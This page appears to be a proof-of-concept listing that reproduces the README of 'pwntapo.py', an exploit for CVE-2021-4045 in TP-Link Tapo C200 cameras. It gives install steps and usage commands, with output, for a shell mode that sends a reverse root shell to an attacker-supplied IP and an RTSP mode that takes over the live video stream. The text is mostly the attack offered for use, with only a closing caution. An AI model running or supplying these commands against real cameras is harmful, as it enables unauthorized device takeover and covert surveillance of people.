
CVE-2021-4045 PoC: TP-LINK Tapo C200 remote code execution vulnerability

Associated Vulnerability
Title: TP-LINK Tapo C200 remote code execution vulnerability (CVE-2021-4045)
Description: TP-Link Tapo C200 IP camera, on its 1.1.15 firmware version and below, is affected by an unauthenticated RCE vulnerability, present in the uhttpd binary running by default as root. The exploitation of this vulnerability allows an attacker to take full control of the camera.
Description
"PWNTAPO: Unveiling Command Injection in TP-Link Tapo C200 Cameras (<= v1.1.16 Build 211209)"
Readme
## TP-Link Tapo c200 1.1.15 - Remote Code Execution (RCE) (CVE-2021-4045)

"PWNTAPO: Unveiling Command Injection in TP-Link Tapo C200 Cameras (<= v1.1.16 Build 211209)"

Read about the exploit from [exploit db](https://www.exploit-db.com/exploits/51017)

This is a command injection vulnerability that affects all TP-Link Tapo C200 camera firmware versions < 1.1.16 Build 211209 Rel. 37726N. To read more about how the exploit works, see this article from [hacefresko](https://www.hacefresko.com/posts/tp-link-tapo-c200-unauthenticated-rce).

## Installation
```shell
git clone https://github.com/B3nj4h/CVE-2021-4045.git
cd CVE-2021-4045
pip install -r requirements.txt
python3 pwntapo.py -h
```
## Usage
```shell
python3 pwntapo.py -h

============================================================================================
    @Pl4inT3XT
   _______      ________    ___   ___ ___  __        _  _    ___  _  _   _____ 
  / ____\ \    / /  ____|  |__ \ / _ \__ \/_ |      | || |  / _ \| || | | ____|
 | |     \ \  / /| |__ ______ ) | | | | ) || |______| || |_| | | | || |_| |__  
 | |      \ \/ / |  __|______/ /| | | |/ / | |______|__   _| | | |__   _|___ \ 
 | |____   \  /  | |____    / /_| |_| / /_ | |         | | | |_| |  | |  ___) |
  \_____|   \/   |______|  |____|\___/____||_|         |_|  \___/   |_| |____/
  
============================================================================================  

usage: pwntapo.py [-h] -M M [-U U] [-P P] [-C C] -H H -A A -p P [-v]

PWNTAPO: Unveiling Command Injection in TP-Link Tapo C200 Cameras (<= v1.1.16 Build 211209)

options:
  -h, --help  show this help message and exit
  -M M        attack mode : shell | rtsp (default: None)
  -U U        RTSP_USER (default: None)
  -P P        RTSP_PASSWORD (default: None)
  -C C        RTSP_CIPHERTEXT (default: None)
  -H H        victim ip address (default: None)
  -A A        attacker ip address (default: None)
  -p P        Listening port (default: None)
  -v          increase output verbosity (default: False)
```

The exploit has two modes: SHELL and RTSP.

## SHELL
In shell mode you only need to provide the victim IP, the attacker IP and the listening port; this spawns a root shell on the device.
```shell
python3 pwntapo.py -M shell -H 192.168.110.121 -A 172.334.121.10 -p 1887

============================================================================================
    @Pl4inT3XT
   _______      ________    ___   ___ ___  __        _  _    ___  _  _   _____ 
  / ____\ \    / /  ____|  |__ \ / _ \__ \/_ |      | || |  / _ \| || | | ____|
 | |     \ \  / /| |__ ______ ) | | | | ) || |______| || |_| | | | || |_| |__  
 | |      \ \/ / |  __|______/ /| | | |/ / | |______|__   _| | | |__   _|___ \ 
 | |____   \  /  | |____    / /_| |_| / /_ | |         | | | |_| |  | |  ___) |
  \_____|   \/   |______|  |____|\___/____||_|         |_|  \___/   |_| |____/
  
============================================================================================  

[+] Listening on port 1887...
[+] Sending reverse shell to 192.168.110.121...

Listening on 0.0.0.0 1887
```
## RTSP
In RTSP mode you also need to provide the RTSP_USER, RTSP_PASSWORD and RTSP_CIPHERTEXT to be able to get live footage from the camera.
```shell
python3 pwntapo.py -M rtsp -H 192.168.110.121 -A 192.168.110.131 -p 1887 -U pwneduser -P pwnedpasswd -C RUW5pUYSBm4gt+5T7bzwEq5r078rcdhSvpJrmtqAKE2mRo8bvvOLfYGnr5GNHfANBeFNEHhucnsK86WJTs4xLEZMbxUS73gPMTYRsEBV4EaKt2f5h+BkSbuh0WcJTHl5FWMbwikslj6qwTX48HasSiEmotK+v1N3NLokHCxtU0k=

============================================================================================
    @Pl4inT3XT
   _______      ________    ___   ___ ___  __        _  _    ___  _  _   _____ 
  / ____\ \    / /  ____|  |__ \ / _ \__ \/_ |      | || |  / _ \| || | | ____|
 | |     \ \  / /| |__ ______ ) | | | | ) || |______| || |_| | | | || |_| |__  
 | |      \ \/ / |  __|______/ /| | | |/ / | |______|__   _| | | |__   _|___ \ 
 | |____   \  /  | |____    / /_| |_| / /_ | |         | | | |_| |  | |  ___) |
  \_____|   \/   |______|  |____|\___/____||_|         |_|  \___/   |_| |____/
  
============================================================================================  

[+] Setting up RTSP video stream...
```
## CAUTION DO NOT RUN THE TOOL ON DEVICES WITHOUT USER PERMISSION
File Snapshot

Repository contents (0 directories, 3 files):
- pwntapo.py (4.2K)
- README.md (4.2K)
- requirements.txt (48 bytes)